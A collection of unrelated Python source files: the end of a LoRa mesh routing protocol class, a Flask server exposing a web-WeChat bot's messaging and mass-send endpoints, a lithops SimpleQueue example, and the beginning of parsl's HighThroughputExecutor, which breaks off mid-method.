self.send_header(header_obj.get_header_str())
def process_ack_header(self, header_obj):
"""
processes message acknowledgement header; if the destination address is equal to the own address the header
object will be added to the message_acknowledgement_list, else the message will be forwarded
@param header_obj: message acknowledgement header object
"""
if header_obj.destination == variables.MY_ADDRESS:
self.delete_from_ack_list(header_obj.message_id)
header_obj.ttl -= 1
logging.debug('forward ack message')
if header_obj.destination != variables.MY_ADDRESS:
self.send_header(header_obj.get_header_str())
else:
logging.debug(f'do not forward ack message, because end node was my address')
def process_registration_header(self, header_obj):
"""
processes registration message header
:param header_obj: object of class RegistrationMessageHeader
"""
if header_obj.source != variables.MY_ADDRESS:
header_obj.ttl -= 1
self.routing_table.add_address_to_processed_registration_messages_list(header_obj.source)
if header_obj.subscribe:
logging.debug('registered new peer')
self.routing_table.add_peer(header_obj.peer_id, header_obj.source)
else:
logging.debug('unregistered peer')
self.routing_table.delete_peer(header_obj.peer_id, header_obj.source)
logging.debug('forward registration message')
self.send_header(header_obj.get_header_str())
else:
self.received_own_registration_message = True
def process_connect_request_header(self, header_obj):
"""
processes connect request header
:param header_obj: object of class ConnectRequestHeader
"""
if header_obj.received_from != variables.MY_ADDRESS:
if header_obj.end_node == variables.MY_ADDRESS:
self.connected_node = header_obj.source
# send connect request to java side
logging.debug("send connect request to java side")
self.sending_queue.put(
ipc.create_connect_request_message(header_obj.source_peer_id, header_obj.target_peer_id,
header_obj.timeout))
elif header_obj.next_node == variables.MY_ADDRESS:
logging.debug('forward connect request header')
route = self.routing_table.get_best_route_for_destination(header_obj.end_node)
if len(route) > 0:
header_obj.next_node = route['next_node']
header_obj.ttl -= 1
self.send_header(header_obj.get_header_str())
else:
logging.debug(f'could not forward connect request header, because there is no routing table entry '
f'for destination address {header_obj.end_node}')
def process_disconnect_request_header(self, header_obj):
"""
processes disconnect request header
:param header_obj: object of class DisconnectRequestHeader
"""
if header_obj.received_from != variables.MY_ADDRESS:
if header_obj.end_node == variables.MY_ADDRESS:
self.connected_node = header_obj.source
                # send disconnect request to java side
logging.debug("send disconnect request to java side")
self.sending_queue.put(
ipc.create_disconnect_request_message(header_obj.source_peer_id, header_obj.target_peer_id))
elif header_obj.next_node == variables.MY_ADDRESS:
logging.debug('forward disconnect request header')
route = self.routing_table.get_best_route_for_destination(header_obj.end_node)
if len(route) > 0:
header_obj.next_node = route['next_node']
header_obj.ttl -= 1
self.send_header(header_obj.get_header_str())
else:
                    logging.debug(f'could not forward disconnect request header, because there is no routing table entry '
f'for destination address {header_obj.end_node}')
def send_connect_request_header(self, source_peer_id, target_peer_id, timeout_in_sec):
"""
sends connect request
:param source_peer_id: peer id of source peer
:param target_peer_id: peer id of target peer
:param timeout_in_sec: timeout in seconds
"""
# look for address of source peer id and check whether source peer is already registered
# wait until timeout for ConnectRequestHeader of other HubConnector
self.check_peers(source_peer_id, target_peer_id)
if not self.routing_table.check_connect_request_entry_already_exists(source_peer_id, target_peer_id):
self.routing_table.add_connect_request(source_peer_id, target_peer_id)
end_node = self.routing_table.get_address_of_peer(target_peer_id)
route = self.routing_table.get_best_route_for_destination(end_node)
if len(route) == 0:
logging.info(
'could not find a route to {}. Sending route request...'.format(end_node))
if self.send_route_request_message(end_node):
route = self.routing_table.get_best_route_for_destination(end_node)
else:
                    logging.info('Got no answer on route request for {}.'.format(end_node))
return
self.send_header(ConnectRequestHeader(None, variables.MY_ADDRESS, variables.DEFAULT_TTL, end_node,
route['next_node'], source_peer_id, target_peer_id,
timeout_in_sec).get_header_str())
def send_disconnect_request_header(self, source_peer_id, target_peer_id):
"""
sends disconnect request
:param source_peer_id: peer id of source peer
:param target_peer_id: peer id of target peer
"""
self.check_peers(source_peer_id, target_peer_id)
end_node = self.routing_table.get_address_of_peer(target_peer_id)
route = self.routing_table.get_best_route_for_destination(end_node)
if len(route) == 0:
logging.info(f'could not find a route to {end_node}. Sending route request...')
if self.send_route_request_message(end_node):
route = self.routing_table.get_best_route_for_destination(end_node)
else:
logging.info(f'Got no answer on route requested for end node: {end_node}')
return
self.send_header(DisconnectRequestHeader(None, variables.MY_ADDRESS, variables.DEFAULT_TTL, end_node,
route['next_node'], source_peer_id, target_peer_id).get_header_str())
def check_peers(self, source_peer_id, target_peer_id):
"""
helper function to check whether peers are already registered; raises ValueError if peer is not registered
:param source_peer_id: peer id of source peer
:param target_peer_id: peer id of target peer
"""
if not self.routing_table.check_peer_is_already_registered(source_peer_id):
raise ValueError(f"source peer '{source_peer_id}' is not registered")
elif not self.routing_table.check_peer_is_already_registered(target_peer_id):
raise ValueError(f"target peer '{target_peer_id}' is not registered")
elif self.routing_table.get_address_of_peer(source_peer_id) != variables.MY_ADDRESS:
raise ValueError('source peer is not registered on this node')
def send_registration_message(self, subscribe, peer_id):
"""
        function to register or unregister a peer
:param subscribe: if True peer will be registered on network; else the peer will be unregistered
:param peer_id: id of peer
"""
if subscribe:
self.routing_table.add_peer(peer_id, variables.MY_ADDRESS)
else:
self.routing_table.delete_peer(peer_id, variables.MY_ADDRESS)
attempts = 0
received_own_request = False
self.received_own_registration_message = False
while attempts < 3:
self.send_header(RegistrationHeader(None, variables.MY_ADDRESS, variables.DEFAULT_TTL, subscribe,
peer_id).get_header_str())
check_attempt_count = 0
while check_attempt_count < 5:
if self.received_own_registration_message:
received_own_request = True
break
else:
check_attempt_count += 1
time.sleep(0.5)
attempts += 1
if received_own_request:
return
def stop(self):
"""
function to shutdown background threads:
thread for reading from serial port
thread for writing to serial port
thread for processing received header messages
"""
self.PROCESS_INCOMING_MESSAGES = False
serial_connection.WRITING_THREAD_ACTIVE = False
serial_connection.READING_THREAD_ACTIVE = False
def add_message_to_waiting_acknowledgement_list(self, message_header_obj):
"""
adds the message id of a message to the list of pending acknowledgements
:param message_header_obj: message as object of class MessageHeader
"""
message_id = message_header_obj.message_id
logging.debug(f"adding '{message_id}' to ack list")
self.MESSAGES_ACKNOWLEDGMENT.append(message_id)
def delete_from_ack_list(self, ack_id):
"""
remove message id from list of pending acknowledgements
:param ack_id: message id which should be deleted
"""
logging.debug(f'remove {ack_id} from ack list')
try:
self.MESSAGES_ACKNOWLEDGMENT.remove(int(ack_id))
except ValueError:
logging.debug(f'ack is not in list. Current ack list: {self.MESSAGES_ACKNOWLEDGMENT}')
@contextmanager
def timeout(time_in_sec):
"""
could be used as context manager to run code snippet until a custom timeout; calls raise_timeout function after
timeout
:param time_in_sec: specifies timeout in seconds
"""
# Register a function to raise a TimeoutError on the signal.
signal.signal(signal.SIGALRM, raise_timeout)
# Schedule the signal to be sent after ``time``.
signal.alarm(time_in_sec)
try:
yield
except TimeoutError:
pass
finally:
# Unregister the signal so it won't be triggered
# if the timeout is not reached.
signal.signal(signal.SIGALRM, signal.SIG_IGN)
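# Hypothetical usage sketch (not part of the original module): run a blocking
# call for at most 5 seconds and silently continue afterwards.
# with timeout(5):
#     some_blocking_call()  # made-up function name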
def raise_timeout(signum, frame):
"""
raises TimeoutError; is called by timeout context manager; to change timeout behavior edit code in this function
"""
raise TimeoutError
def wait_random_time():
"""
sleep for a random time; timespan is between 0 and variables.MAX_SLEEP_TIME seconds
"""
sleep_time = random.uniform(0, variables.MAX_SLEEP_TIME)
logging.debug('waiting {} seconds before sending'.format(sleep_time))
time.sleep(sleep_time)
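# Hypothetical usage sketch (not part of the original module): rough outline of
# starting the protocol and sending a payload. The peer ids and payload are
# made-up values, the serial_connection reader/writer threads are assumed to be
# running already, and send_message() only does something once a connection
# (self.connected_node) has been established.
def _protocol_usage_example():
    protocol = Protocol()
    protocol.start_protocol_thread()
    protocol.send_registration_message(True, 'peer-a')             # register local peer
    # 'peer-b' must have announced itself via a registration message first
    protocol.send_connect_request_header('peer-a', 'peer-b', 30)   # ask peer-b to connect
    protocol.send_message(b'hello over LoRa')                      # payload must be bytes
    protocol.stop()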
|
weixin_bot.py
|
#!/usr/bin/env python
# coding: utf-8
#===================================================
from wechat import WeChat
from wechat.utils import *
from wx_handler import WeChatMsgProcessor
from wx_handler import Bot
from db import SqliteDB
from db import MysqlDB
from config import ConfigManager
from config import Constant
from config import Log
#---------------------------------------------------
from flask import Flask, render_template, send_file, jsonify, request
import threading
import traceback
import os
import logging
import time
#===================================================
cm = ConfigManager()
db = SqliteDB(cm.getpath('database'))
# db = MysqlDB(cm.mysql())
wechat_msg_processor = WeChatMsgProcessor(db)
wechat = WeChat(cm.get('wechat', 'host'))
wechat.db = db
wechat.bot = Bot()
wechat.msg_handler = wechat_msg_processor
wechat_msg_processor.wechat = wechat
PORT = int(cm.get('setting', 'server_port'))
app = Flask(__name__, template_folder='flask_templates')
app.config['UPLOAD_FOLDER'] = cm.getpath('uploaddir')
logger = logging.getLogger('werkzeug')
log_format_str = Constant.SERVER_LOG_FORMAT
formatter = logging.Formatter(log_format_str)
flask_log_handler = logging.FileHandler(cm.getpath('server_log_file'))
flask_log_handler.setLevel(logging.INFO)
flask_log_handler.setFormatter(formatter)
logger.addHandler(flask_log_handler)
app.logger.addHandler(flask_log_handler)
@app.route('/')
def index():
return render_template(Constant.SERVER_PAGE_INDEX)
@app.route('/qrcode')
def qrcode():
qdir = cm.getpath('qrcodedir')
if not os.path.exists(qdir):
os.makedirs(qdir)
image_path = '%s/%s_%d.png' % (qdir, wechat.uuid, int(time.time()*100))
s = wechat.wx_conf['API_qrcode'] + wechat.uuid
str2qr_image(s, image_path)
return send_file(image_path, mimetype='image/png')
@app.route("/group_list")
def group_list():
"""
@brief list groups
"""
result = wechat.db.select(Constant.TABLE_GROUP_LIST())
return jsonify({'count': len(result), 'group': result})
@app.route('/group_member_list/<g_id>')
def group_member_list(g_id):
"""
@brief list group member
@param g_id String
"""
result = wechat.db.select(Constant.TABLE_GROUP_USER_LIST(), 'RoomID', g_id)
return jsonify({'count': len(result), 'member': result})
@app.route('/group_chat_log/<g_name>')
def group_chat_log(g_name):
"""
@brief list group chat log
@param g_name String
"""
result = wechat.db.select(Constant.TABLE_GROUP_MSG_LOG, 'RoomName', g_name)
return jsonify({'count': len(result), 'chats': result})
@app.route('/upload', methods=['GET', 'POST'])
def upload_file():
if request.method == 'POST':
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1] in Constant.SERVER_UPLOAD_ALLOWED_EXTENSIONS
j = {'ret': 1, 'msg': ''}
# check if the post request has the file part
if 'file' not in request.files:
j['msg'] = 'No file part'
return jsonify(j)
        # if the user does not select a file, the browser may also
        # submit an empty part without a filename
file = request.files['file']
if file.filename == '':
j['msg'] = 'No selected file'
elif file and allowed_file(file.filename):
filename = generate_file_name(file.filename)
file_path = os.path.join(app.config['UPLOAD_FOLDER'], filename)
file.save(file_path)
j['ret'] = 0
j['msg'] = filename
else:
j['msg'] = 'File type not support'
return jsonify(j)
else:
return render_template(Constant.SERVER_PAGE_UPLOAD)
@app.route('/send_msg/<to>/<msg>')
def send_msg(to, msg):
"""
    @brief send message to user or group
@param to: String, user id or group id
@param msg: String, words
"""
return jsonify({'ret': 0 if wechat.send_text(to, msg) else 1})
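# Hypothetical request sketch (not part of the original file): the route above is
# a plain GET endpoint, so a text message could be sent with e.g.
#   curl http://localhost:<server_port>/send_msg/<user_or_group_id>/hello
# where <server_port> comes from the [setting] section of the config file.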
@app.route('/send_img/<to>/<img>')
def send_img(to, img):
"""
    @brief send image to user or group
@param to: String, user id or group id
@param img: String, image file name
"""
img_path = os.path.join(app.config['UPLOAD_FOLDER'], img)
return jsonify({'ret': 0 if wechat.send_img(to, img_path) else 1})
@app.route('/send_emot/<to>/<emot>')
def send_emot(to, emot):
"""
    @brief send emotion to user or group
@param to: String, user id or group id
@param emot: String, emotion file name
"""
emot_path = os.path.join(app.config['UPLOAD_FOLDER'], emot)
return jsonify({'ret': 0 if wechat.send_emot(to, emot_path) else 1})
@app.route('/send_file/<to>/<file>')
def send_file_api(to, file):  # distinct name so flask.send_file (used in qrcode) is not shadowed
"""
    @brief send file to user or group
@param to: String, user id or group id
@param file: String, file name
"""
file_path = os.path.join(app.config['UPLOAD_FOLDER'], file)
return jsonify({'ret': 0 if wechat.send_file(to, file_path) else 1})
def mass_send(method, data, func):
j = {'ret': -1, 'unsend_list':[]}
if method == 'POST' and data:
to_list = data['to_list']
msg = data['msg']
media_type = data.get('media_type', '')
if media_type in ['img', 'emot']:
file_path = os.path.join(app.config['UPLOAD_FOLDER'], msg)
response = wechat.webwxuploadmedia(file_path)
if response is not None:
msg = response['MediaId']
elif media_type == 'file':
file_path = os.path.join(app.config['UPLOAD_FOLDER'], msg)
data = {
'appid': Constant.API_WXAPPID,
'title': msg,
'totallen': '',
'attachid': '',
'type': wechat.wx_conf['APPMSGTYPE_ATTACH'],
'fileext': msg.split('.')[-1],
}
response = wechat.webwxuploadmedia(file_path)
if response is not None:
data['totallen'] = response['StartPos']
data['attachid'] = response['MediaId']
else:
Log.error('File upload error')
msg = data
for groups in split_array(to_list, 20):
for g in groups:
r = func(g, msg)
if not r:
j['unsend_list'].append(g)
time.sleep(1)
j['ret'] = len(j['unsend_list'])
return j
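# Editor's note: the mass_send_* routes below expect a JSON body matching the
# keys read by mass_send() above; the ids and file name here are placeholders.
#
#     POST /mass_send_msg/    (Content-Type: application/json)
#     {
#         "to_list": ["@@group_id_1", "@@group_id_2"],
#         "msg": "hello everyone",
#         "media_type": ""   # "" for text, or "img" / "emot" / "file" with an uploaded file name in "msg"
#     }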
@app.route('/mass_send_msg/', methods=["GET", "POST"])
def mass_send_msg():
"""
    @brief send text to mass users or groups
"""
j = mass_send(request.method, request.json, wechat.send_text)
return jsonify(j)
@app.route('/mass_send_img', methods=["GET", "POST"])
def mass_send_img():
"""
    @brief send image to mass users or groups
"""
j = mass_send(request.method, request.json, wechat.webwxsendmsgimg)
return jsonify(j)
@app.route('/mass_send_emot', methods=["GET", "POST"])
def mass_send_emot():
"""
    @brief send emoticon to mass users or groups
"""
j = mass_send(request.method, request.json, wechat.webwxsendemoticon)
return jsonify(j)
@app.route('/mass_send_file', methods=["GET", "POST"])
def mass_send_file():
"""
    @brief send file to mass users or groups
"""
j = mass_send(request.method, request.json, wechat.webwxsendappmsg)
return jsonify(j)
def run_server():
app.run(port=PORT)
if cm.get('setting', 'server_mode') == 'True':
serverProcess = threading.Thread(target=run_server)
serverProcess.start()
while True:
try:
wechat.start()
except KeyboardInterrupt:
echo(Constant.LOG_MSG_QUIT)
wechat.exit_code = 1
    except Exception:
Log.error(traceback.format_exc())
finally:
wechat.stop()
if wechat.exit_code == 0:
echo(Constant.MAIN_RESTART)
else:
# kill process
os.system(Constant.LOG_MSG_KILL_PROCESS % os.getpid())
|
simple_queue.py
|
from lithops.multiprocessing import Process, SimpleQueue
def f(q):
q.put([42, None, 'hello World'])
if __name__ == '__main__':
q = SimpleQueue()
p = Process(target=f, args=(q,))
p.start()
    print(q.get())    # prints "[42, None, 'hello World']"
p.join()
|
executor.py
|
from concurrent.futures import Future
import typeguard
import logging
import threading
import queue
import datetime
import pickle
from multiprocessing import Process, Queue
from typing import Dict # noqa F401 (used in type annotation)
from typing import List, Optional, Tuple, Union, Any
import math
from parsl.serialize import pack_apply_message, deserialize
from parsl.app.errors import RemoteExceptionWrapper
from parsl.executors.high_throughput import zmq_pipes
from parsl.executors.high_throughput import interchange
from parsl.executors.errors import (
BadMessage, ScalingFailed,
DeserializationError, SerializationError,
UnsupportedFeatureError
)
from parsl.executors.status_handling import StatusHandlingExecutor
from parsl.providers.provider_base import ExecutionProvider
from parsl.data_provider.staging import Staging
from parsl.addresses import get_all_addresses
from parsl.process_loggers import wrap_with_logs
from parsl.utils import RepresentationMixin
from parsl.providers import LocalProvider
logger = logging.getLogger(__name__)
class HighThroughputExecutor(StatusHandlingExecutor, RepresentationMixin):
"""Executor designed for cluster-scale
The HighThroughputExecutor system has the following components:
1. The HighThroughputExecutor instance which is run as part of the Parsl script.
    2. The Interchange, which acts as a load-balancing proxy between workers and Parsl
3. The multiprocessing based worker pool which coordinates task execution over several
cores on a node.
4. ZeroMQ pipes connect the HighThroughputExecutor, Interchange and the process_worker_pool
Here is a diagram
.. code:: python
| Data | Executor | Interchange | External Process(es)
| Flow | | |
Task | Kernel | | |
+----->|-------->|------------>|->outgoing_q---|-> process_worker_pool
| | | | batching | | |
Parsl<---Fut-| | | load-balancing| result exception
^ | | | watchdogs | | |
| | | Q_mngmnt | | V V
| | | Thread<--|-incoming_q<---|--- +---------+
| | | | | |
| | | | | |
+----update_fut-----+
Each of the workers in each process_worker_pool has access to its local rank through
an environmental variable, ``PARSL_WORKER_RANK``. The local rank is unique for each process
    and is an integer in the range from 0 to the number of workers in the pool minus 1.
The workers also have access to the ID of the worker pool as ``PARSL_WORKER_POOL_ID``
and the size of the worker pool as ``PARSL_WORKER_COUNT``.
Parameters
----------
provider : :class:`~parsl.providers.provider_base.ExecutionProvider`
Provider to access computation resources. Can be one of :class:`~parsl.providers.aws.aws.EC2Provider`,
:class:`~parsl.providers.cobalt.cobalt.Cobalt`,
:class:`~parsl.providers.condor.condor.Condor`,
:class:`~parsl.providers.googlecloud.googlecloud.GoogleCloud`,
:class:`~parsl.providers.gridEngine.gridEngine.GridEngine`,
:class:`~parsl.providers.local.local.Local`,
:class:`~parsl.providers.sge.sge.GridEngine`,
:class:`~parsl.providers.slurm.slurm.Slurm`, or
:class:`~parsl.providers.torque.torque.Torque`.
label : str
Label for this executor instance.
launch_cmd : str
Command line string to launch the process_worker_pool from the provider. The command line string
will be formatted with appropriate values for the following values (debug, task_url, result_url,
        cores_per_worker, nodes_per_block, heartbeat_period, heartbeat_threshold, logdir). For example:
launch_cmd="process_worker_pool.py {debug} -c {cores_per_worker} --task_url={task_url} --result_url={result_url}"
address : string
An address to connect to the main Parsl process which is reachable from the network in which
workers will be running. This can be either a hostname as returned by ``hostname`` or an
IP address. Most login nodes on clusters have several network interfaces available, only
some of which can be reached from the compute nodes.
By default, the executor will attempt to enumerate and connect through all possible addresses.
Setting an address here overrides the default behavior.
default=None
worker_ports : (int, int)
Specify the ports to be used by workers to connect to Parsl. If this option is specified,
worker_port_range will not be honored.
worker_port_range : (int, int)
Worker ports will be chosen between the two integers provided.
interchange_port_range : (int, int)
Port range used by Parsl to communicate with the Interchange.
working_dir : str
Working dir to be used by the executor.
worker_debug : Bool
Enables worker debug logging.
managed : Bool
If this executor is managed by the DFK or externally handled.
cores_per_worker : float
cores to be assigned to each worker. Oversubscription is possible
by setting cores_per_worker < 1.0. Default=1
mem_per_worker : float
GB of memory required per worker. If this option is specified, the node manager
will check the available memory at startup and limit the number of workers such that
        there is sufficient memory for each worker. Default: None
max_workers : int
Caps the number of workers launched per node. Default: infinity
cpu_affinity: string
Whether or how each worker process sets thread affinity. Options are "none" to forgo
any CPU affinity configuration, "block" to assign adjacent cores to workers
(ex: assign 0-1 to worker 0, 2-3 to worker 1), and
"alternating" to assign cores to workers in round-robin
(ex: assign 0,2 to worker 0, 1,3 to worker 1).
prefetch_capacity : int
Number of tasks that could be prefetched over available worker capacity.
When there are a few tasks (<100) or when tasks are long running, this option should
be set to 0 for better load balancing. Default is 0.
address_probe_timeout : int | None
        Managers attempt connecting over many different addresses to determine a viable address.
This option sets a time limit in seconds on the connection attempt.
Default of None implies 30s timeout set on worker.
heartbeat_threshold : int
Seconds since the last message from the counterpart in the communication pair:
        (interchange, manager) after which the counterpart is assumed to be unavailable. Default: 120s
heartbeat_period : int
Number of seconds after which a heartbeat message indicating liveness is sent to the
counterpart (interchange, manager). Default: 30s
poll_period : int
Timeout period to be used by the executor components in milliseconds. Increasing poll_periods
trades performance for cpu efficiency. Default: 10ms
worker_logdir_root : string
In case of a remote file system, specify the path to where logs will be kept.
"""
@typeguard.typechecked
def __init__(self,
label: str = 'HighThroughputExecutor',
provider: ExecutionProvider = LocalProvider(),
launch_cmd: Optional[str] = None,
address: Optional[str] = None,
worker_ports: Optional[Tuple[int, int]] = None,
worker_port_range: Optional[Tuple[int, int]] = (54000, 55000),
interchange_port_range: Optional[Tuple[int, int]] = (55000, 56000),
storage_access: Optional[List[Staging]] = None,
working_dir: Optional[str] = None,
worker_debug: bool = False,
cores_per_worker: float = 1.0,
mem_per_worker: Optional[float] = None,
max_workers: Union[int, float] = float('inf'),
cpu_affinity: str = 'none',
prefetch_capacity: int = 0,
heartbeat_threshold: int = 120,
heartbeat_period: int = 30,
poll_period: int = 10,
address_probe_timeout: Optional[int] = None,
managed: bool = True,
worker_logdir_root: Optional[str] = None):
logger.debug("Initializing HighThroughputExecutor")
StatusHandlingExecutor.__init__(self, provider)
self.label = label
self.launch_cmd = launch_cmd
self.worker_debug = worker_debug
self.storage_access = storage_access
self.working_dir = working_dir
self.managed = managed
self.blocks = {} # type: Dict[str, str]
self.block_mapping = {} # type: Dict[str, str]
self.cores_per_worker = cores_per_worker
self.mem_per_worker = mem_per_worker
self.max_workers = max_workers
self.prefetch_capacity = prefetch_capacity
self.address = address
self.address_probe_timeout = address_probe_timeout
if self.address:
self.all_addresses = address
else:
self.all_addresses = ','.join(get_all_addresses())
mem_slots = max_workers
cpu_slots = max_workers
if hasattr(self.provider, 'mem_per_node') and \
self.provider.mem_per_node is not None and \
mem_per_worker is not None and \
mem_per_worker > 0:
mem_slots = math.floor(self.provider.mem_per_node / mem_per_worker)
if hasattr(self.provider, 'cores_per_node') and \
self.provider.cores_per_node is not None:
cpu_slots = math.floor(self.provider.cores_per_node / cores_per_worker)
self.workers_per_node = min(max_workers, mem_slots, cpu_slots)
if self.workers_per_node == float('inf'):
self.workers_per_node = 1 # our best guess-- we do not have any provider hints
self._task_counter = 0
self.run_id = None # set to the correct run_id in dfk
self.hub_address = None # set to the correct hub address in dfk
self.hub_port = None # set to the correct hub port in dfk
self.worker_ports = worker_ports
self.worker_port_range = worker_port_range
self.interchange_port_range = interchange_port_range
self.heartbeat_threshold = heartbeat_threshold
self.heartbeat_period = heartbeat_period
self.poll_period = poll_period
self.run_dir = '.'
self.worker_logdir_root = worker_logdir_root
self.cpu_affinity = cpu_affinity
if not launch_cmd:
self.launch_cmd = ("process_worker_pool.py {debug} {max_workers} "
"-a {addresses} "
"-p {prefetch_capacity} "
"-c {cores_per_worker} "
"-m {mem_per_worker} "
"--poll {poll_period} "
"--task_port={task_port} "
"--result_port={result_port} "
"--logdir={logdir} "
"--block_id={{block_id}} "
"--hb_period={heartbeat_period} "
"{address_probe_timeout_string} "
"--hb_threshold={heartbeat_threshold} "
"--cpu-affinity {cpu_affinity} ")
def initialize_scaling(self):
""" Compose the launch command and call the scale_out
This should be implemented in the child classes to take care of
executor specific oddities.
"""
debug_opts = "--debug" if self.worker_debug else ""
max_workers = "" if self.max_workers == float('inf') else "--max_workers={}".format(self.max_workers)
address_probe_timeout_string = ""
if self.address_probe_timeout:
address_probe_timeout_string = "--address_probe_timeout={}".format(self.address_probe_timeout)
worker_logdir = "{}/{}".format(self.run_dir, self.label)
if self.worker_logdir_root is not None:
worker_logdir = "{}/{}".format(self.worker_logdir_root, self.label)
l_cmd = self.launch_cmd.format(debug=debug_opts,
prefetch_capacity=self.prefetch_capacity,
address_probe_timeout_string=address_probe_timeout_string,
addresses=self.all_addresses,
task_port=self.worker_task_port,
result_port=self.worker_result_port,
cores_per_worker=self.cores_per_worker,
mem_per_worker=self.mem_per_worker,
max_workers=max_workers,
nodes_per_block=self.provider.nodes_per_block,
heartbeat_period=self.heartbeat_period,
heartbeat_threshold=self.heartbeat_threshold,
poll_period=self.poll_period,
logdir=worker_logdir,
cpu_affinity=self.cpu_affinity)
self.launch_cmd = l_cmd
logger.debug("Launch command: {}".format(self.launch_cmd))
self._scaling_enabled = True
logger.debug("Starting HighThroughputExecutor with provider:\n%s", self.provider)
# TODO: why is this a provider property?
block_ids = []
if hasattr(self.provider, 'init_blocks'):
try:
block_ids = self.scale_out(blocks=self.provider.init_blocks)
except Exception as e:
logger.error("Scaling out failed: {}".format(e))
raise e
return block_ids
def start(self):
"""Create the Interchange process and connect to it.
"""
self.outgoing_q = zmq_pipes.TasksOutgoing("127.0.0.1", self.interchange_port_range)
self.incoming_q = zmq_pipes.ResultsIncoming("127.0.0.1", self.interchange_port_range)
self.command_client = zmq_pipes.CommandClient("127.0.0.1", self.interchange_port_range)
self.is_alive = True
self._queue_management_thread = None
self._start_queue_management_thread()
self._start_local_queue_process()
logger.debug("Created management thread: {}".format(self._queue_management_thread))
block_ids = self.initialize_scaling()
return block_ids
@wrap_with_logs
def _queue_management_worker(self):
"""Listen to the queue for task status messages and handle them.
Depending on the message, tasks will be updated with results, exceptions,
or updates. It expects the following messages:
.. code:: python
{
"task_id" : <task_id>
"result" : serialized result object, if task succeeded
... more tags could be added later
}
{
"task_id" : <task_id>
"exception" : serialized exception object, on failure
}
We do not support these yet, but they could be added easily.
.. code:: python
{
"task_id" : <task_id>
"cpu_stat" : <>
"mem_stat" : <>
"io_stat" : <>
"started" : tstamp
}
The `None` message is a die request.
"""
logger.debug("[MTHREAD] queue management worker starting")
while not self.bad_state_is_set:
try:
msgs = self.incoming_q.get(timeout=1)
except queue.Empty:
logger.debug("[MTHREAD] queue empty")
# Timed out.
pass
except IOError as e:
logger.exception("[MTHREAD] Caught broken queue with exception code {}: {}".format(e.errno, e))
return
except Exception as e:
logger.exception("[MTHREAD] Caught unknown exception: {}".format(e))
return
else:
if msgs is None:
logger.debug("[MTHREAD] Got None, exiting")
return
else:
for serialized_msg in msgs:
try:
msg = pickle.loads(serialized_msg)
tid = msg['task_id']
except pickle.UnpicklingError:
raise BadMessage("Message received could not be unpickled")
except Exception:
raise BadMessage("Message received does not contain 'task_id' field")
if tid == -1 and 'exception' in msg:
logger.warning("Executor shutting down due to exception from interchange")
exception = deserialize(msg['exception'])
self.set_bad_state_and_fail_all(exception)
break
elif tid == -1 and 'heartbeat' in msg:
continue
task_fut = self.tasks.pop(tid)
if 'result' in msg:
result = deserialize(msg['result'])
task_fut.set_result(result)
elif 'exception' in msg:
try:
s = deserialize(msg['exception'])
# s should be a RemoteExceptionWrapper... so we can reraise it
if isinstance(s, RemoteExceptionWrapper):
try:
s.reraise()
except Exception as e:
task_fut.set_exception(e)
elif isinstance(s, Exception):
task_fut.set_exception(s)
else:
raise ValueError("Unknown exception-like type received: {}".format(type(s)))
except Exception as e:
# TODO could be a proper wrapped exception?
task_fut.set_exception(
DeserializationError("Received exception, but handling also threw an exception: {}".format(e)))
else:
raise BadMessage("Message received is neither result or exception")
if not self.is_alive:
break
logger.info("[MTHREAD] queue management worker finished")
def _start_local_queue_process(self):
""" Starts the interchange process locally
Starts the interchange process locally and uses an internal command queue to
get the worker task and result ports that the interchange has bound to.
"""
comm_q = Queue(maxsize=10)
self.queue_proc = Process(target=interchange.starter,
args=(comm_q,),
kwargs={"client_ports": (self.outgoing_q.port,
self.incoming_q.port,
self.command_client.port),
"worker_ports": self.worker_ports,
"worker_port_range": self.worker_port_range,
"hub_address": self.hub_address,
"hub_port": self.hub_port,
"logdir": "{}/{}".format(self.run_dir, self.label),
"heartbeat_threshold": self.heartbeat_threshold,
"poll_period": self.poll_period,
"logging_level": logging.DEBUG if self.worker_debug else logging.INFO
},
daemon=True,
name="HTEX-Interchange"
)
self.queue_proc.start()
try:
(self.worker_task_port, self.worker_result_port) = comm_q.get(block=True, timeout=120)
except queue.Empty:
logger.error("Interchange has not completed initialization in 120s. Aborting")
raise Exception("Interchange failed to start")
def _start_queue_management_thread(self):
"""Method to start the management thread as a daemon.
Checks if a thread already exists, then starts it.
Could be used later as a restart if the management thread dies.
"""
if self._queue_management_thread is None:
logger.debug("Starting queue management thread")
self._queue_management_thread = threading.Thread(target=self._queue_management_worker, name="HTEX-Queue-Management-Thread")
self._queue_management_thread.daemon = True
self._queue_management_thread.start()
logger.debug("Started queue management thread")
else:
logger.debug("Management thread already exists, returning")
def hold_worker(self, worker_id):
"""Puts a worker on hold, preventing scheduling of additional tasks to it.
This is called "hold" mostly because this only stops scheduling of tasks,
and does not actually kill the worker.
Parameters
----------
worker_id : str
Worker id to be put on hold
"""
c = self.command_client.run("HOLD_WORKER;{}".format(worker_id))
logger.debug("Sent hold request to worker: {}".format(worker_id))
return c
@property
def outstanding(self):
outstanding_c = self.command_client.run("OUTSTANDING_C")
return outstanding_c
@property
def connected_workers(self):
workers = self.command_client.run("WORKERS")
return workers
@property
def connected_managers(self):
workers = self.command_client.run("MANAGERS")
return workers
def _hold_block(self, block_id):
""" Sends hold command to all managers which are in a specific block
Parameters
----------
block_id : str
Block identifier of the block to be put on hold
"""
managers = self.connected_managers
for manager in managers:
if manager['block_id'] == block_id:
logger.debug("[HOLD_BLOCK]: Sending hold to manager: {}".format(manager['manager']))
self.hold_worker(manager['manager'])
def submit(self, func, resource_specification, *args, **kwargs):
"""Submits work to the the outgoing_q.
The outgoing_q is an external process listens on this
queue for new work. This method behaves like a
submit call as described here `Python docs: <https://docs.python.org/3/library/concurrent.futures.html#concurrent.futures.ThreadPoolExecutor>`_
Args:
- func (callable) : Callable function
- args (list) : List of arbitrary positional arguments.
Kwargs:
- kwargs (dict) : A dictionary of arbitrary keyword args for func.
Returns:
Future
"""
if resource_specification:
logger.error("Ignoring the resource specification. "
"Parsl resource specification is not supported in HighThroughput Executor. "
"Please check WorkQueueExecutor if resource specification is needed.")
raise UnsupportedFeatureError('resource specification', 'HighThroughput Executor', 'WorkQueue Executor')
if self.bad_state_is_set:
raise self.executor_exception
self._task_counter += 1
task_id = self._task_counter
# handle people sending blobs gracefully
args_to_print = args
if logger.getEffectiveLevel() >= logging.DEBUG:
args_to_print = tuple([arg if len(repr(arg)) < 100 else (repr(arg)[:100] + '...') for arg in args])
logger.debug("Pushing function {} to queue with args {}".format(func, args_to_print))
fut = Future()
self.tasks[task_id] = fut
try:
fn_buf = pack_apply_message(func, args, kwargs,
buffer_threshold=1024 * 1024)
